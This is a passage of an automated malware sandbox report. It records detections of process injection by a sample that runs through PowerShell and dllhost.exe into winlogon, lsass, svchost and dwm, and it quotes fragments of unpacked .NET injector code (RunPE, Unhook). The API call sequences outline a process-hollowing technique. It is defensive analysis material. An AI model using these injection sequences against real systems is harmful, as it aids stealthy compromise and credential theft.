Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001CA7D218814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_000001CA7D218814
Source: C:\Windows\System32\lsass.exe	Code function: 43_2_0000017D2DD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000017D2DD5CD80
Source: C:\Windows\System32\lsass.exe	Code function: 43_2_0000017D2DD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	43_2_0000017D2DD584B0
Source: C:\Windows\System32\lsass.exe	Code function: 43_2_0000017D2DD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	43_2_0000017D2DD58814
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B928814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_0000022F4B928814
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B92CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_0000022F4B92CD80
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B9284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_0000022F4B9284B0
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B958814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_0000022F4B958814
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B95CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_0000022F4B95CD80
Source: C:\Windows\System32\svchost.exe	Code function: 44_2_0000022F4B9584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_0000022F4B9584B0
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1CD8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	45_2_00000262F1CD8814
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1CDCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_00000262F1CDCD80
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1CD84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_00000262F1CD84B0
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1D08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	45_2_00000262F1D08814
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1D0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_00000262F1D0CD80
Source: C:\Windows\System32\dwm.exe	Code function: 45_2_00000262F1D084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_00000262F1D084B0
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023942B1CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	46_2_0000023942B1CD80
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023942B18814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	46_2_0000023942B18814
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023942B184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	46_2_0000023942B184B0
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF056DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000001EF056DCD80
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF056D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	47_2_000001EF056D8814
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF056D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000001EF056D84B0
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF0570CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000001EF0570CD80
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF05708814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	47_2_000001EF05708814
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001EF057084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000001EF057084B0

HIPS / PFW / Operating System Protection Evasion

.NET source code contains process injector

Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 39.2.powershell.exe.1909cf124f8.12.raw.unpack, RunPE.cs	.Net Code: Run contains injection code
Source: 39.2.powershell.exe.1908cbc0000.0.raw.unpack, RunPE.cs	.Net Code: Run contains injection code

.NET source code references suspicious native API functions

Source: 38.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs	Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 38.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs	Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dllhost.exe

Code function: 41_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,

41_2_0000000140002434

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: D10000
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 7D1B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: 2DD22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4B922EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4B8F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: F1CD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\dwm.exe EIP: F1CA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 42AE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 56A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 7AD42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 4DA62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 2542EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: EBF92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F1632EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F1602EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6A1A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 6A172EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 26992EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 5D5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: AB962EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 9B2D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 9B2A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 841B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25D92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E122EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 78732EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5FCF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A5D82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F41C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 25342EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FCF42EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F3532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 26282EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 59C82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 31E62EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 137C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A3B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E4192EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1452EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 68FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 951C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 63512EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4E122EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 98582EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3C5C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CF3D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E332EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A2952EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 340C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 53792EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A0E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30B32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 35DA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 792F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E9172EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 59C82EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E6E02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1AC02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B2812EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 1352EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D2532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 532EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B22EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 44DD2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B00D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9A262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B71A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 82022EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 706E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6A4A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 43F2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15D12EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD5E2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 570C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E5262EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 90B2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B7A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E6E02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B2812EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: B825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 15225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E525AC
